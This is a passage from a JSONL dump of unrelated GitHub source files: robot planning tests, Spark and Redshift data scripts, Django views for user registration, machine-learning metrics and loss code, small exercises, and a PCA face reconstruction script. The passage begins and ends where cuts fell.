main.parse_file_to_dict(domain_fname)\n domain = parse_domain_config.ParseDomainConfig.parse(d_c)\n hls = hl_solver.FFSolver(d_c)\n print(\"loading laundry problem...\")\n p_c = main.parse_file_to_dict('../domains/laundry_domain/laundry_probs/single_cloth_policy.prob')\n\n plans = []\n\n ll_solver = robot_ll_solver.RobotLLSolver()\n\n for i in range(50):\n\n plan_str = [\n '1: MOVETO BAXTER ROBOT_INIT_POSE CLOTH_GRASP_BEGIN_0',\n '2: CLOTH_GRASP BAXTER CLOTH_0 CLOTH_TARGET_BEGIN_0 CLOTH_GRASP_BEGIN_0 CG_EE_0 CLOTH_GRASP_END_0',\n '3: MOVEHOLDING_CLOTH BAXTER CLOTH_GRASP_END_0 CLOTH_PUTDOWN_BEGIN_0 CLOTH_0',\n '4: PUT_INTO_BASKET BAXTER CLOTH_0 BASKET CLOTH_TARGET_END_0 END_TARGET CLOTH_PUTDOWN_BEGIN_0 CP_EE_0 CLOTH_PUTDOWN_END_0',\n '5: MOVETO BAXTER CLOTH_PUTDOWN_END_0 ROBOT_END_POSE'\n ]\n\n ## Use this if multiple cloths in the plan\n # for i in range(1, 20):\n # plan_str.append('{0}: MOVETO BAXTER CLOTH_PUTDOWN_END_{1} CLOTH_GRASP_BEGIN_{2}'.format((i-1)*3+1, i-1, i))\n # plan_str.append('{0}: CLOTH_GRASP BAXTER CLOTH_{1} CLOTH_TARGET_BEGIN_{2} CLOTH_GRASP_BEGIN_{3} CG_EE_{4} CLOTH_GRASP_END_{5}'.format((i-1)*3+2, i, i, i, i, i))\n # plan_str.append('{0}: CLOTH_PUTDOWN BAXTER CLOTH_{1} CLOTH_TARGET_END_{2}, CLOTH_PUTDOWN_BEGIN_{3} CP_EE_{4} CLOTH_PUTDOWN_END_{5}'.format((i-1)*3+3, i, i, i, i, i))\n\n problem = parse_problem_config.ParseProblemConfig.parse(p_c, domain)\n random_pose = get_random_cloth_init_pose(problem.init_state.params['table'].pose[:,0])\n problem.init_state.params['cloth_target_begin_0'].value[:,0] = random_pose\n problem.init_state.params['cloth_0'].pose[:,0] = random_pose\n\n plan = hls.get_plan(plan_str, domain, problem)\n result = ll_solver.backtrack_solve(plan)\n if not result:\n continue\n plan.time = np.ones((1, plan.horizon))\n baxter = plan.params['baxter']\n cloth = plan.params['cloth_0']\n basket = plan.params['basket']\n table = plan.params['table']\n plan.dX, plan.state_inds, plan.dU, plan.action_inds = policy_solver_utils.get_plan_to_policy_mapping(plan, x_params=[baxter, cloth, basket, table], \\\n u_attrs=set(['lArmPose', 'lGripper', 'rArmPose', 'rGripper']))\n plans.append(plan)\n\n solver = policy_solver.BaxterPolicySolver()\n solver.train_policy(plans)\n import ipdb; ipdb.set_trace()\n","repo_name":"Algorithmic-Alignment-Lab/openTAMP","sub_path":"opentamp/test/test_policy_hooks/test_policy_solver.py","file_name":"test_policy_solver.py","file_ext":"py","file_size_in_byte":6198,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"40"} +{"seq_id":"29594431442","text":"l = lineitem.filter(\"l_returnflag == 'R' \")\no = orders.filter(\"o_orderdate >= '1994-11-01' \").filter(\"o_orderdate < '1995-02-01'\")\noc = o.join(customer, o.O_CUSTKEY == customer.C_CUSTKEY)\nocn = oc.join(nation, oc.C_NATIONKEY == nation.N_NATIONKEY)\n\ntemp = ocn.join(l, l.L_ORDERKEY == ocn.O_ORDERKEY)\ntemp2 = temp.select('C_CUSTKEY', 'C_NAME', (temp.L_EXTENDEDPRICE * (1 - temp.L_DISCOUNT)).alias(\"VOLUME\"), 'C_ACCTBAL',\n 'N_NAME', 'C_ADDRESS', 'C_PHONE', 'C_COMMENT', 'C_PHONE')\nresult = temp2.groupBy('C_CUSTKEY', 'C_NAME', 'C_ACCTBAL', 'N_NAME', 'C_ADDRESS', 'C_COMMENT', 'C_PHONE').agg(\n func.sum(\"VOLUME\").alias(\"REVENUE\")).limit(10)\nresult.show()\n","repo_name":"gharghashe/tpc-benchmark","sub_path":"OLAP/spark/query/q (10).py","file_name":"q (10).py","file_ext":"py","file_size_in_byte":674,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"10057491218","text":"import configparser\nimport psycopg2\nfrom sql_queries import create_table_queries, drop_table_queries\n\n\ndef drop_tables(cur, conn):\n \"\"\"Drop existing tables to duplicates from same record\n \n cur : cursor to perform database operations\n conn : establish a connection to the database\n \"\"\"\n for query in drop_table_queries:\n cur.execute(query)\n conn.commit()\n\n\ndef create_tables(cur, conn):\n \"\"\"Excutes queries to create tables in the dataset\n \n cur : cursor to perform database operations\n conn : establish a connection to the database\n \"\"\"\n for query in create_table_queries:\n cur.execute(query)\n conn.commit()\n\n\ndef main():\n \"\"\"Read AWS configuration parameters and create staging, fact and dimension tables \"\"\"\n \n config = configparser.ConfigParser()\n config.read('dwh.cfg')\n\n conn = psycopg2.connect(\"host={} dbname={} user={} password={} port={}\".format(*config['CLUSTER'].values()))\n cur = conn.cursor()\n\n #drop tables first to clean previous data from other tests\n drop_tables(cur, conn)\n #create staging, fact and dimension tables\n create_tables(cur, conn)\n\n conn.close()\n\n\nif __name__ == \"__main__\":\n main()","repo_name":"aliescont/Data_warehouse","sub_path":"create_tables.py","file_name":"create_tables.py","file_ext":"py","file_size_in_byte":1213,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"15504800551","text":"from django.contrib import admin\nfrom django.urls import path\nfrom products import views\n\nurlpatterns = [\n path(\"\", views.index, name=\"Products\"),\n path(\"trending/\", views.trending, name=\"Trending\"),\n path(\"new/\", views.new, name=\"New\"),\n path(\"contact/\", views.contact, name=\"Contact\"),\n path(\"products/\", views.products, name=\"Products\"),\n path(\"purchase/\", views.purchase, name=\"Purchase\"),\n path(\"products/leds/\", views.leds, name=\"LED\"),\n path(\"products/mobiles/\",views.mobiles,name='Mobile'),\n path(\"products/laptops/\",views.laptops,name=\"Laptop\"),\n\n\n]\n","repo_name":"anmolbaunthiyal/Electronic-Website","sub_path":"products/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":586,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"29277105588","text":"import tensorflow as tf\nimport numpy as np\nimport itertools\nimport prepare_image\nfrom scipy.special import expit\nfrom sklearn.metrics import f1_score, accuracy_score, precision_score, \\\n recall_score, roc_auc_score, confusion_matrix, average_precision_score\nimport matplotlib.pyplot as plt\nimport scikitplot as skplt\nimport sklearn\nfrom PIL import Image\nfrom sklearn.metrics import precision_recall_curve\n\n\ndef softmax(x):\n \"\"\"Compute softmax values for each sets of scores in x.\"\"\"\n e_x = np.exp(x - np.max(x))\n return e_x / e_x.sum(axis=0)\n\n\ndef tf_accuracy(predict_data, test_data):\n predict = tf.constant(predict_data, dtype=tf.float32, shape=test_data.shape)\n test = tf.constant(test_data, dtype=tf.float32, shape=test_data.shape)\n sess = tf.InteractiveSession()\n\n verify = tf.cast(tf.equal(tf.argmax(predict, axis=1), tf.argmax(test, axis=1)), dtype=tf.float32)\n accuracy = tf.reduce_mean(verify)\n\n b_p = tf.reduce_sum(tf.cast(tf.equal(tf.argmax(predict, axis=1), 3), dtype=tf.float32))\n b_t = tf.reduce_sum(tf.cast(tf.equal(tf.argmax(test, axis=1), 3), dtype=tf.float32))\n\n a_p = tf.reduce_sum(tf.cast(tf.equal(tf.argmax(predict, axis=1), 0), dtype=tf.float32))\n a_t = tf.reduce_sum(tf.cast(tf.equal(tf.argmax(test, axis=1), 0), dtype=tf.float32))\n\n o_p = tf.reduce_sum(tf.cast(tf.equal(tf.argmax(predict, axis=1), 1), dtype=tf.float32))\n o_t = tf.reduce_sum(tf.cast(tf.equal(tf.argmax(test, axis=1), 1), dtype=tf.float32))\n\n v_p = tf.reduce_sum(tf.cast(tf.equal(tf.argmax(predict, axis=1), 2), dtype=tf.float32))\n v_t = tf.reduce_sum(tf.cast(tf.equal(tf.argmax(test, axis=1), 2), dtype=tf.float32))\n \n print(\"Accuracy of Background is {}\".format(sess.run(1 - abs(b_t-b_p)/b_t)))\n print(\"Accuracy of Arteries is {}\".format(sess.run(1 - abs(a_t - a_p) / a_t)))\n print(\"Accuracy of Veins is {}\".format(sess.run(1 - abs(v_t - v_p) / v_t)))\n print(\"Accuracy of Overlap is {}\".format(sess.run(1 - abs(o_t - o_p) / o_t)))\n print(\"Overall accuracy is {}\".format(sess.run(accuracy)))\n\n\ndef np_f1score(predict_data, test_data):\n print(len(predict_data))\n predict = np.argmax(predict_data, axis=1).reshape(len(predict_data) * 565 * 565)\n test = np.argmax(test_data, axis=1).reshape(len(predict_data) * 565 * 565)\n f1_s = f1_score(test, predict, average=None)\n f1_s_w = f1_score(test, predict, average='weighted')\n precision_s = precision_score(test, predict, average=None)\n precision_s_w = precision_score(test, predict, average='weighted')\n recall_s = recall_score(test, predict, average=None)\n recall_s_w = recall_score(test, predict, average='weighted')\n print(\"Precision of A,O,V,B is {}\".format(precision_s))\n print(\"Overall Precision is {}\".format(precision_s_w))\n print(\"Recall of A,O,V,B is {}\".format(recall_s))\n print(\"Overall Recall is {}\".format(recall_s_w))\n print(\"F1-Score of A,O,V,B {}\".format(f1_s))\n print(\"Overall F-1 Score is {}\".format(f1_s_w))\n\n\ndef plot_confusion_matrix(predict_data, test_data):\n predict = np.argmax(predict_data, axis=1).reshape(len(predict_data) * 565 * 565)\n test = np.argmax(test_data, axis=1).reshape(len(predict_data) * 565 * 565)\n conf_matrix = confusion_matrix(test, predict)\n print(\"Confusion matrix is {}\".format(conf_matrix))\n plt.imshow(conf_matrix, interpolation='bessel', cmap=plt.cm.Blues)\n plt.title(\"Confusion matrix\")\n plt.colorbar()\n tick_marks = np.arange(4)\n plt.xticks(tick_marks, ['arteries', 'overlap', 'veins', 'background'], rotation=45)\n plt.yticks(tick_marks, ['arteries', 'overlap', 'veins', 'background'])\n\n thresh = conf_matrix.max() / 4.\n for i, j in itertools.product(range(conf_matrix.shape[0]), range(conf_matrix.shape[1])):\n plt.text(j, i, conf_matrix[i, j], horizontalalignment=\"center\",\n color=\"white\" if conf_matrix[i, j] > thresh else \"black\")\n\n plt.tight_layout()\n plt.ylabel('True label')\n plt.xlabel('Predicted label')\n plt.savefig(\"data/document_images/confusion_matrix.png\")\n\n\ndef plot_precision_recall(predict_data, test_data):\n precision = dict()\n recall = dict()\n average_precision = dict()\n print(test_data.shape)\n for i in range(4):\n precision[i], recall[i], _ = precision_recall_curve(test_data[i, ...],\n predict_data[i, ...])\n average_precision[i] = average_precision_score(test_data[i, ...], predict_data[i, ...])\n\nif __name__ == \"__main__\":\n # predict_data = np.load('cache/test_predict2_class_4_relu.npy')\n predict_data = np.load('cache/test_predict2_class_4_dev2_relu.npy')\n # predict_data = np.load ('cache/test_predict2_class_4_soft_relu.npy')\n test_data = prepare_image.load_images(data_type=\"test\", image_type=\"label\", classification=4,\n dataset=\"small\")\n tf_accuracy(predict_data=predict_data, test_data= test_data)\n np_f1score(predict_data=predict_data, test_data= test_data)\n plot_confusion_matrix(predict_data=predict_data, test_data= test_data)\n \"\"\"\n # plot_precision_recall(predict_data=predict_data, test_data= test_data)\n print(test_data.shape)\n predict = np.argmax(predict_data, axis=1).reshape(len(predict_data) * 565 * 565)\n test = np.argmax(test_data, axis=1).reshape(len(predict_data) * 565 * 565)\n print(sklearn.metrics.roc_curve(test,predict,pos_label=4))\n print(sklearn.metrics.precision_recall_curve(test, predict, pos_label=4))\n \"\"\"\n\n\n\n","repo_name":"neeru0303/Retinal-Segmentation","sub_path":"python/generate_metrics.py","file_name":"generate_metrics.py","file_ext":"py","file_size_in_byte":5515,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"9439267349","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Jan 25 02:10:11 2022\n\n@author: Prashanth C S\n\"\"\"\n\ntotal_cost = 1000000\n\npercent_down_payment = 0.25\nportion_down_payment = percent_down_payment * total_cost\nannual_return_rate = 0.04\nannual_salary = 150000\nmonthly_salary = annual_salary/12\n#portion_saved = int(input('Enter the percent of your salary to save: '))/100\n#portion_saved_monthly = portion_saved * monthly_salary\n\n\nannual_raise = 0.07\n#enter_the_months = int(input(\"Enter the months you want to save for: \"))\nacceptable_difference = 100\n\n\n\ndef getTotalSavings(monthly_saving_rate, monthly_salary, annual_salary):\n monthly_saving_rate = monthly_saving_rate / 10000\n #print(\"monthly_saving_rate\",monthly_saving_rate)\n \n current_savings = 0\n interest_accrued = 0\n #print(\"monthly_salary\",monthly_salary)\n #print(\"annual_salary\",annual_salary)\n portion_saved_monthly = monthly_saving_rate * monthly_salary\n #print(\"portion_saved_monthly\",portion_saved_monthly)\n for i in range(1,37):\n monthly_interest = (current_savings*annual_return_rate)/12\n interest_accrued += monthly_interest\n current_savings += portion_saved_monthly + monthly_interest\n if(i % 6 == 0):\n annual_salary += annual_salary * annual_raise\n monthly_salary = annual_salary/12\n portion_saved_monthly = monthly_saving_rate * monthly_salary\n return round(current_savings)\n\ncount = 0\n\ndef getPercent(low, high):\n global count\n count += 1\n \n mid = (high + low) / 2\n #print(\"count:\",count,\"low, high, mid is \",low, high, mid)\n down_payment = round(portion_down_payment);\n savings = getTotalSavings(mid, monthly_salary, annual_salary)\n #print(\"savings: \",savings)\n # difference = savings - down_payment\n if count >= 12:\n return mid\n if( savings in range(down_payment-100, down_payment+100)):\n return mid\n if(savings < down_payment):\n return getPercent(mid, high)\n return getPercent(low, mid)\n\n\n\nprint(getPercent(0,10000)/10000)","repo_name":"prashanth4474/MIT_6_0001","sub_path":"ps1/ps1ctest.py","file_name":"ps1ctest.py","file_ext":"py","file_size_in_byte":2038,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"28308498373","text":"from cProfile import label\nimport numpy as np\nimport networkx as nx\nimport matplotlib.pyplot as plt\nfrom networkx.algorithms.operators.unary import reverse\nfrom networkx.algorithms.sparsifiers import _lightest_edge_dicts\nfrom networkx.classes.function import all_neighbors, neighbors, nodes\n\n#x0 est supposé être un vecteur colone\ndef prob_xt(matrix, x0, t):\n power = np.linalg.matrix_power(matrix, t)\n return np.dot(x0,power)\n\n\n\ndef showgraph(matrix, dists):\n pxts = [[] for _ in range(len(dists))]\n for i in range(len(dists)):\n for j in range(0, 30):\n pxts[i].append(prob_xt(matrix, dists[i], j))\n\n fig, axes = plt.subplots(3)\n for i in range(len(dists)):\n axes[i].set(xlabel='Temps t', ylabel='P(Xt)', ylim=(0.,1.))\n axes[i].set_title(f'Distribution n°{i+1}')\n axes[i].label_outer()\n for j in range(len(matrix)):\n axes[i].plot([pxt[j] for pxt in pxts[i]], label = f'Etat n°{j+1}')\n\n plt.subplots_adjust(hspace=0.3)\n plt.legend(loc='center left', bbox_to_anchor=(1, 1))\n plt.tight_layout()\n plt.show()\n\ntrans_mat1 = np.array([[0, 1/2, 1/2],[1/3, 1/3, 1/3],[1/2, 1/2, 0]])\ntrans_mat2 = np.array([[1/3, 1/2, 1/6],[1/3, 1/3, 1/3],[0, 0, 1]])\ntrans_mat3 = np.array([[0, 0, 1, 0],[0, 0, 1, 0],[1, 0, 0, 0],[1/2, 1/2, 0, 0]])\n\nmat1_st_x0 = np.array([1/3, 1/3, 1/3]) \nmat1_nd_x0 = np.array([1/6, 1/2, 1/3])\nmat1_rd_x0 = np.array([1/10, 5/10, 2/5])\n\n\nmat2_st_x0 = np.array([1/4, 1/2, 1/4]) \nmat2_nd_x0 = np.array([0, 1, 0])\nmat2_rd_x0 = np.array([1/10, 9/10, 0])\n\nmat3_st_x0 = np.array([1/4, 1/4, 1/4, 1/4]) \nmat3_nd_x0 = np.array([0, 0, 0, 1])\nmat3_rd_x0 = np.array([1/3, 1/2, 0, 1/6])\n\nshowgraph(trans_mat1, [mat1_st_x0, mat1_nd_x0, mat1_rd_x0])\nshowgraph(trans_mat2, [mat2_st_x0, mat2_nd_x0, mat2_rd_x0])\nshowgraph(trans_mat3, [mat3_st_x0, mat3_nd_x0, mat3_rd_x0])\n# prendre 3 differanet au choix dont 1 qui va etre uniforme (tous les meme)\n# calcul prob_xt de 0 a 100 \n#fait le graphe en fonction du temps (un graphe pour les 3 etat)","repo_name":"blacksages/processus-stochastiques","sub_path":"chaine1.3.py","file_name":"chaine1.3.py","file_ext":"py","file_size_in_byte":2022,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"35333218260","text":"seat_assignment = ' 24A '\ngate_announcement = 'Boarding for flight UA 123 has begun.'\nseat_assignment = '24a'\ngate_number = 'B12'\ncities = ['New York', 'Los Angeles', 'Chicago']\n\n# Enter your solution here\nclean_seat_assignment = seat_assignment.strip()\nupdated_announcement = gate_announcement.replace(\"Departing\", \"Boarding\")\nuppercase_seat = seat_assignment.upper()\ngate = gate_number[1:]\nterminal = gate_number[:1]\ncities_string = \",\".join(cities)\n\nprint(clean_seat_assignment)\nprint(updated_announcement)\nprint(uppercase_seat)\nprint(terminal)\nprint(gate)\nprint(cities_string)","repo_name":"eccololo/pkrakowiak-udemy-course","sub_path":"course-2-exercises/68_exercise.py","file_name":"68_exercise.py","file_ext":"py","file_size_in_byte":580,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"41786848286","text":"from django.shortcuts import render\nfrom rest_framework.generics import GenericAPIView\nfrom api.userprofile.serializers import RegistrationSerializer, UserSerializer\nfrom rest_framework.response import Response\nfrom rest_framework import status\nfrom django.contrib.auth.models import User\nfrom django.shortcuts import render, redirect\nfrom django.contrib import messages\n\n# Verification email\nfrom django.template.loader import render_to_string\nfrom django.utils.http import urlsafe_base64_encode\nfrom django.utils.encoding import force_bytes\nfrom django.utils.http import urlsafe_base64_encode, urlsafe_base64_decode\nfrom django.contrib.auth.tokens import default_token_generator\nfrom django.core.mail import EmailMessage\n\nfrom rest_framework.views import APIView\nfrom rest_framework.permissions import IsAuthenticated, IsAdminUser, BasePermission, SAFE_METHODS\n\nfrom rest_framework.permissions import DjangoObjectPermissions\n\nfrom django.http import Http404\n\nfrom userprofile.models import Profile\nfrom rest_framework import permissions\n\nclass RegistrationAPIView(GenericAPIView):\n serializer_class = RegistrationSerializer\n\n def post(self, request):\n serializer = RegistrationSerializer(data=request.data)\n if serializer.is_valid():\n user = serializer.save() \n profile = Profile(user=user)\n profile.save()\n\n # USER ACTIVATION\n current_site = '127.0.0.1:8000'\n mail_subject = 'Please activate your account'\n message = render_to_string('api/account_verification_email.html', {\n 'user': user,\n 'domain': current_site,\n 'uid': urlsafe_base64_encode(force_bytes(user.pk)),\n 'token': default_token_generator.make_token(user),\n })\n\n to_email = serializer.data['email']\n send_email = EmailMessage(mail_subject, message, to=[to_email])\n #send_email.send() \n\n return Response(serializer.data, status=status.HTTP_201_CREATED)\n\n return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)\n\n\ndef Activate(request, uidb64, token):\n try:\n uid = urlsafe_base64_decode(uidb64).decode()\n user = User._default_manager.get(pk=uid)\n except(TypeError, ValueError, OverflowError, User.DoesNotExist):\n user = None\n\n if user is not None and default_token_generator.check_token(user, token):\n user.is_active = True\n user.save()\n messages.success(request, 'Congratulations! Your account is activated.')\n return redirect('/accounts/login/') #TODO\n else:\n messages.error(request, 'Invalid activation link')\n return redirect('/accounts/login/') #TODO \n\n\nclass CustomUserPermission(permissions.BasePermission):\n\n def is_group_allow(self, theperm):\n # Return True if user in Groups\n for group in theperm:\n if group in ['supervisor', 'manager']:\n return True\n \n return False\n\n def has_permission(self, request, view):\n \n custom_perms = request.user.groups.values_list('name',flat=True) \n perm_groups = list(custom_perms) \n \n is_GroupAllow = self.is_group_allow(perm_groups) #Check with group (Has 3 Groups [manager, supervisor, staff], see an images)\n if not is_GroupAllow:\n return request.user == User.objects.get(pk=view.kwargs['pk'])\n\n #return request.user.has_perm('userprofile.change_profile') #Check with has_perm('foo.change_bar')\nclass UpdateFirstLast_Name(APIView): \n \n \"\"\"\n Update first_name, last_name\n \"\"\"\n permission_classes = (CustomUserPermission,)\n\n def get_object(self, pk):\n try:\n return User._default_manager.get(pk=pk)\n except User.DoesNotExist:\n raise Http404 \n \n def patch(self, request, pk, format=None): \n user = self.get_object(pk)\n serializer = UserSerializer(user, data=request.data, partial=True)\n\n chkfields = list()\n fieldslist = list(serializer.fields)\n for k, v in request.data.items():\n if k not in fieldslist:\n chkfields.append(k) \n\n if ((serializer.is_valid()) and (len(chkfields) == 0)):\n serializer.save()\n return Response(serializer.data)\n\n if len(chkfields) > 0:\n err_str = {\"detail: Field(s) incorrect !\": chkfields}\n return Response(err_str, status=status.HTTP_400_BAD_REQUEST)\n\n return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST) ","repo_name":"samrids/django_permission","sub_path":"api/userprofile/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":4635,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"73992569400","text":"import pytest\n\nfrom envs.breakout import (\n BreakoutCollisionEvent,\n BreakoutEnv,\n CollisionPlatformWall,\n)\nfrom tests.math_utils import almost_equal_float\n\n\n@pytest.mark.breakout\n@pytest.mark.collisions\n@pytest.mark.platform\n@pytest.mark.wall\nclass TestCollisionsPlatformWall:\n def test_platform_left_wall_collision_type(\n self,\n breakout: BreakoutEnv,\n platform_left_wall_collision_level,\n ):\n level, action, ticks = platform_left_wall_collision_level\n breakout.import_state(level)\n\n breakout.step(\n action=action,\n dt=ticks,\n )\n\n events = breakout.pop_events()\n assert len(events) == 1\n event = events[0]\n assert isinstance(event, BreakoutCollisionEvent)\n assert isinstance(event.collision, CollisionPlatformWall)\n assert almost_equal_float(\n event.collision.platform.rect.left, breakout.rect.left, eps=1e-3\n )\n\n def test_platform_right_wall_collision_type(\n self,\n breakout: BreakoutEnv,\n platform_right_wall_collision_level,\n ):\n level, action, ticks = platform_right_wall_collision_level\n breakout.import_state(level)\n\n breakout.step(\n action=action,\n dt=ticks,\n )\n\n events = breakout.pop_events()\n assert len(events) == 1\n event = events[0]\n assert isinstance(event, BreakoutCollisionEvent)\n assert isinstance(event.collision, CollisionPlatformWall)\n assert almost_equal_float(\n event.collision.platform.rect.right, breakout.rect.right, eps=1e-3\n )\n","repo_name":"hatterton/agym","sub_path":"src/tests/integration/breakout_collisions/test_platform_wall.py","file_name":"test_platform_wall.py","file_ext":"py","file_size_in_byte":1639,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"16885015255","text":"from turtle import forward\nimport torch\nimport torch.nn.functional as F\n\nclass ContrastiveLoss(torch.nn.Module):\n def __init__(self, T=0.5):\n super().__init__()\n self.T = T\n def forward(self, x, y):\n representations = x\n label = y\n T = self.T\n n = label.shape[0] # batch\n #这步得到它的相似度矩阵\n similarity_matrix = F.cosine_similarity(representations.unsqueeze(1), representations.unsqueeze(0), dim=2)\n similarity_matrix = similarity_matrix.cuda()\n #这步得到它的label矩阵,相同label的位置为1\n mask = torch.ones_like(similarity_matrix) * (label.expand(n, n).eq(label.expand(n, n).t()))\n mask = mask.cuda()\n\n #这步得到它的不同类的矩阵,不同类的位置为1\n mask_no_sim = torch.ones_like(mask) - mask\n\n #这步产生一个对角线全为0的,其他位置为1的矩阵\n mask_dui_jiao_0 = torch.ones(n ,n) - torch.eye(n, n )\n mask_dui_jiao_0 = mask_dui_jiao_0.cuda()\n\n #这步给相似度矩阵求exp,并且除以温度参数T\n similarity_matrix = torch.exp(similarity_matrix/T)\n\n #这步将相似度矩阵的对角线上的值全置0,因为对比损失不需要自己与自己的相似度\n similarity_matrix = similarity_matrix*mask_dui_jiao_0\n\n\n #这步产生了相同类别的相似度矩阵,标签相同的位置保存它们的相似度,其他位置都是0,对角线上也为0\n sim = mask*similarity_matrix\n\n\n #用原先的对角线为0的相似度矩阵减去相同类别的相似度矩阵就是不同类别的相似度矩阵\n no_sim = similarity_matrix - sim\n\n\n #把不同类别的相似度矩阵按行求和,得到的是对比损失的分母(还一个与分子相同的那个相似度,后面会加上)\n no_sim_sum = torch.sum(no_sim , dim=1)\n\n '''\n 将上面的矩阵扩展一下,再转置,加到sim(也就是相同标签的矩阵上),然后再把sim矩阵与sim_num矩阵做除法。\n 至于为什么这么做,就是因为对比损失的分母存在一个同类别的相似度,就是分子的数据。做了除法之后,就能得到\n 每个标签相同的相似度与它不同标签的相似度的值,它们在一个矩阵(loss矩阵)中。\n '''\n no_sim_sum_expend = no_sim_sum.repeat(n, 1).T\n sim_sum = sim + no_sim_sum_expend\n loss = torch.div(sim , sim_sum)\n\n\n '''\n 由于loss矩阵中,存在0数值,那么在求-log的时候会出错。这时候,我们就将loss矩阵里面为0的地方\n 全部加上1,然后再去求loss矩阵的值,那么-log1 = 0 ,就是我们想要的。\n '''\n #loss = torch.sum(mask_no_sim, loss, torch.eye(n, n ))\n loss = mask_no_sim + loss + (torch.eye(n, n )).cuda()\n\n\n #接下来就是算一个批次中的loss了\n loss = -torch.log(loss) #求-log\n loss = torch.sum(torch.sum(loss, dim=1) )/(2*n) #将所有数据都加起来除以2n\n\n return loss\n\n#loss_func = ContrastiveLoss()\n\n\n","repo_name":"ZyGan1999/ContrastiveLearningWithTransformer","sub_path":"model/contrastive.py","file_name":"contrastive.py","file_ext":"py","file_size_in_byte":3133,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"14929952779","text":"import os\nimport sys\nimport glob\nimport cv2\nimport numpy as np\n\n# 폴더와 파일 생성해서 결과 작성\nSTUDENT_CODE = '2017147505'\nFILE_NAME = 'output.txt'\nif not os.path.exists(STUDENT_CODE):\n os.mkdir(STUDENT_CODE)\nf = open(os.path.join(STUDENT_CODE, FILE_NAME), 'w')\n\n# 우선 이미지를 전부 읽어와서 vectorize한 다음 하나로 합친다.\n# (39, 192 * 168)\ntrain_images = []\n\nimage = cv2.imread(\"faces_training/face01.pgm\", cv2.IMREAD_GRAYSCALE)\ntrain_images.append(image)\n\nlength, height = image.shape\nimage = image.reshape((length * height * 1, 1))\n\nfor i in range(2, 10):\n x = cv2.imread(f\"faces_training/face0{i}.pgm\", cv2.IMREAD_GRAYSCALE)\n train_images.append(x)\n temp = x.reshape((length * height * 1, 1))\n image = np.concatenate([image, temp], axis=1)\n\nfor i in range(10, 40):\n x = cv2.imread(f\"faces_training/face{i}.pgm\", cv2.IMREAD_GRAYSCALE)\n train_images.append(x)\n temp = x.reshape((length * height * 1, 1))\n image = np.concatenate([image, temp], axis=1)\n\ntrain_all_image = image\n\n\ndef computeDimensions(img, percent=0.95):\n \"\"\"\n 전체 이미지 행렬과 퍼센트를 인자로 받아서 reconstruction된 이미지와\n selected Dimension의 갯수를 반환하는 함수\n \"\"\"\n # computing eigenvalues and eigenvectors of covariance matrix\n img_mean = np.mean(img.T, axis=1)\n img = (img - img_mean)\n\n U, Sv, Vt = np.linalg.svd(img, full_matrices=False)\n\n # Sv 는 고유값 리스트이다.\n Sv = sorted(Sv)\n Sv = Sv[::-1] # 순서를 높은게 앞에 오도록 변경\n eigvals = [x**2 for x in Sv]\n\n sum_of = 0\n numPc = 0\n sum_all = sum(eigvals)\n\n for e in eigvals:\n sum_of += e\n numPc += 1\n if(sum_of/sum_all >= percent):\n break\n\n U = U[:, :numPc] # 입력된 pc 개수에 따라 선택한다.\n Sv = np.diag(Sv[:numPc])\n Vt = Vt[:numPc, :]\n reconstruct = np.dot(U, np.dot(Sv, Vt)) + img_mean\n\n return reconstruct, numPc, U\n\n\n# 목표로 할 퍼센트\nperc = float(sys.argv[1])\n\n# 값을 전달해서 추출\nreconstruct, numPc, truncU = computeDimensions(train_all_image, perc)\n\n\nf.write(\"######### STEP 1 #########\\n\")\nf.write(f\"Input Percentage: {perc}\\n\")\nf.write(f\"Selected Dimansion : {numPc}\\n\")\n\n\nf.write(\"\\n######### STEP 2 #########\\n\")\nf.write(\"Reconstruction error\\n\")\n\n# Reconstruction 에러를 담는 리스트\nre_error = []\n\n# Reconstructione 된 이미지를 담는 리스트\nre_imgs = []\n\nfor n in range(39):\n re_err_sum = 0\n # 각 행별로 벡터를 가져와서 다시 이미지화 한다.\n re_img = reconstruct[:, n].reshape(length, height)\n for i in range(length):\n for j in range(height):\n re_err_sum += np.abs(train_images[n][i][j] - re_img[i][j])**2\n # 전체 에러를 픽셀 개수로 나눈다.\n re_error.append(re_err_sum/(length*height))\n re_imgs.append(re_img)\n\n# 에러 작성하고 이미지 저장.\nf.write(f\"average : {round(sum(re_error)/len(re_error),4)}\\n\")\nfor n in range(1, 10):\n f.write(f\"0{n}: {round(re_error[n-1],4)}\\n\")\n cv2.imwrite(f\"{STUDENT_CODE}/face0{n}.png\", re_imgs[n-1])\n\nfor n in range(10, 40):\n f.write(f\"{n}: {round(re_error[n-1],4)}\\n\")\n cv2.imwrite(f\"{STUDENT_CODE}/face{n}.png\", re_imgs[n-1])\n\n\nf.write(\"\\n######### STEP 3 ##########\")\n\ntest_images = []\n# 테스트 데이터세트의 이미지들도 벡터화해서 매트릭스로 바꿔준다.\ntest_all_imgs = cv2.imread(\"faces_test/test01.pgm\", cv2.IMREAD_GRAYSCALE)\ntest_images.append(test_all_imgs)\n\nimg_size = test_all_imgs.shape\ntest_all_imgs = test_all_imgs.reshape((length * height * 1, 1))\n\nfor i in range(2, 6):\n x = cv2.imread(f\"faces_test/test0{i}.pgm\", cv2.IMREAD_GRAYSCALE)\n test_images.append(x)\n temp = x.reshape((length * height * 1, 